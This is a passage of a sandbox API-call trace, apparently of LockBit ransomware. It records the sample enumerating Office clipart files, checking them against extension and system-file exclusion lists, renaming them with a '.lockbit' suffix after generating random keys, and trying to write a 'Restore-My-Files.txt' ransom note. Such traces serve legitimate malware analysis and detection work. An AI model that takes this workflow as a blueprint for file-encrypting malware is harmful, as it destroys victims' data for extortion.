dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0150.266] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74cf7c00, ftCreationTime.dwHighDateTime=0x1be390f, ftLastAccessTime.dwLowDateTime=0x56510d10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x74cf7c00, ftLastWriteTime.dwHighDateTime=0x1be390f, nFileSizeHigh=0x0, nFileSizeLow=0x1b00, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0196358.WMF", cAlternateFileName="")) returned 1 [0150.266] lstrcmpiW (lpString1=".", lpString2="J0196358.WMF") returned -1 [0150.266] lstrcmpiW (lpString1="..", lpString2="J0196358.WMF") returned -1 [0150.266] PathFindExtensionW (pszPath="J0196358.WMF") returned=".WMF" [0150.266] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0150.266] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0150.267] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0150.267] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0150.267] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0150.267] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0150.267] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0150.267] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0150.267] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0150.267] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0150.267] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0150.267] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0150.267] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0150.267] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0150.267] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0150.267] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0150.267] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0150.267] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0150.267] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0150.267] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0150.267] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0150.267] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0150.267] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0150.267] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0150.267] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.267] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0150.267] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0150.268] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0150.268] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0150.268] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0150.268] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0150.268] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0150.268] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0150.268] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0150.268] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0150.268] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0150.268] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0150.268] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0150.268] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0150.268] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0150.268] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0150.268] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0150.268] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.268] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0150.268] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0150.268] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0150.268] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0150.268] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0196358.WMF") returned 1 [0150.268] lstrcmpiW (lpString1="ntldr", lpString2="J0196358.WMF") returned 1 [0150.268] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0196358.WMF") returned 1 [0150.269] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0196358.WMF") returned -1 [0150.269] lstrcmpiW (lpString1="autorun.inf", lpString2="J0196358.WMF") returned -1 [0150.269] lstrcmpiW (lpString1="thumbs.db", lpString2="J0196358.WMF") returned 1 [0150.269] lstrcmpiW (lpString1="iconcache.db", lpString2="J0196358.WMF") returned -1 [0150.269] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0150.269] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0196358.WMF") returned=".WMF" [0150.269] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0150.269] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0150.269] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0150.269] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0150.269] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0150.269] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0150.269] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0150.269] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0150.269] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0150.269] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0150.269] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0150.269] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0150.269] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0150.270] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0150.270] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0150.270] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0150.270] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0150.270] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0150.270] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0150.270] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0150.270] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0150.270] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0150.270] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0150.270] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0150.270] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0150.270] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0150.270] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0150.270] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0150.270] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0196358.WMF.lockbit") returned 72 [0150.271] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0196358.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0196358.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0150.272] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0150.272] malloc (_Size=0x40068) returned 0x3ef0008 [0150.272] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=6912) returned 1 [0150.272] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.272] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.272] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0150.272] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.273] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.273] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0150.273] ReadFile (in: hFile=0xec, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0150.278] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0196358.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0196358.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0150.278] malloc (_Size=0xa6) returned 0x1fa2ed8 [0150.278] NtSetInformationFile (FileHandle=0xec, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0150.282] free (_Block=0x1fa2ed8) [0150.282] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0196358.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0150.282] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0150.282] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0150.283] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78630300, ftCreationTime.dwHighDateTime=0x1be390f, ftLastAccessTime.dwLowDateTime=0x6600bcb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78630300, ftLastWriteTime.dwHighDateTime=0x1be390f, nFileSizeHigh=0x0, nFileSizeLow=0x164c, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0196364.WMF", cAlternateFileName="")) returned 1 [0150.283] lstrcmpiW (lpString1=".", lpString2="J0196364.WMF") returned -1 [0150.283] lstrcmpiW (lpString1="..", lpString2="J0196364.WMF") returned -1 [0150.283] PathFindExtensionW (pszPath="J0196364.WMF") returned=".WMF" [0150.283] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0150.283] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0150.283] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0150.283] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0150.283] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0150.283] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0150.283] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0150.283] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0150.283] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0150.283] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0150.283] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0150.283] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0150.284] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0150.284] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0150.284] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0150.284] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0150.284] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0150.284] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0150.284] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0150.284] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0150.284] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0150.284] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0150.284] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0150.284] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0150.284] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.284] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0150.284] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0150.284] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0150.285] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0150.285] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0150.285] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0150.285] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0150.285] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0150.285] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0150.285] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0150.285] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0150.285] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0150.285] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0150.285] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0150.285] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0150.285] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0150.285] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0150.285] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.285] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0150.285] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0150.285] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0150.286] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0150.286] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0196364.WMF") returned 1 [0150.286] lstrcmpiW (lpString1="ntldr", lpString2="J0196364.WMF") returned 1 [0150.286] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0196364.WMF") returned 1 [0150.286] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0196364.WMF") returned -1 [0150.286] lstrcmpiW (lpString1="autorun.inf", lpString2="J0196364.WMF") returned -1 [0150.286] lstrcmpiW (lpString1="thumbs.db", lpString2="J0196364.WMF") returned 1 [0150.286] lstrcmpiW (lpString1="iconcache.db", lpString2="J0196364.WMF") returned -1 [0150.286] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0150.286] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0196364.WMF") returned=".WMF" [0150.286] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0150.286] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0150.286] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0150.286] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0150.286] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0150.286] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0150.287] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0150.287] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0150.287] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0150.287] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0150.287] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0150.287] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0150.287] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0150.287] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0150.287] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0150.287] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0150.287] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0150.287] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0150.287] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0150.287] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0150.287] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0150.287] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0150.287] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0150.288] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0150.288] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0150.288] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0150.288] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0150.288] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0150.288] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0196364.WMF.lockbit") returned 72 [0150.288] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0196364.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0196364.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0150.295] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0150.295] malloc (_Size=0x40068) returned 0x1ff1e60 [0150.295] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=5708) returned 1 [0150.295] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.296] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.296] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0150.296] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.296] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.296] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0150.297] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0150.300] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0196364.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0196364.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0150.300] malloc (_Size=0xa6) returned 0x1fa2ed8 [0150.300] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0150.301] free (_Block=0x1fa2ed8) [0150.301] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0196364.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0150.301] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0150.301] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0150.301] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6600bcb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x9d26, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0197979.WMF", cAlternateFileName="")) returned 1 [0150.301] lstrcmpiW (lpString1=".", lpString2="J0197979.WMF") returned -1 [0150.301] lstrcmpiW (lpString1="..", lpString2="J0197979.WMF") returned -1 [0150.301] PathFindExtensionW (pszPath="J0197979.WMF") returned=".WMF" [0150.301] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0150.301] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0150.302] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0150.302] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0150.302] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0150.302] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0150.302] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0150.302] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0150.302] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0150.302] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0150.302] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0150.302] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0150.302] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0150.302] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0150.302] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0150.302] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0150.302] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0150.302] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0150.302] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0150.302] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0150.302] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0150.302] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0150.302] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0150.303] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0150.303] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.303] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0150.303] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0150.303] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0150.303] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0150.303] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0150.303] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0150.303] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0150.303] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0150.303] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0150.303] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0150.303] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0150.303] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0150.303] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0150.303] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0150.303] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0150.303] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0150.303] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0150.303] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.303] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0150.304] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0150.304] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0150.304] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0150.304] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0197979.WMF") returned 1 [0150.304] lstrcmpiW (lpString1="ntldr", lpString2="J0197979.WMF") returned 1 [0150.304] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0197979.WMF") returned 1 [0150.304] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0197979.WMF") returned -1 [0150.304] lstrcmpiW (lpString1="autorun.inf", lpString2="J0197979.WMF") returned -1 [0150.304] lstrcmpiW (lpString1="thumbs.db", lpString2="J0197979.WMF") returned 1 [0150.304] lstrcmpiW (lpString1="iconcache.db", lpString2="J0197979.WMF") returned -1 [0150.304] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0150.304] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0197979.WMF") returned=".WMF" [0150.304] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0150.304] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0150.304] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0150.304] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0150.304] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0150.304] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0150.304] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0150.304] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0150.304] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0150.305] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0150.305] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0150.305] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0150.305] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0150.305] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0150.305] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0150.305] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0150.305] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0150.305] 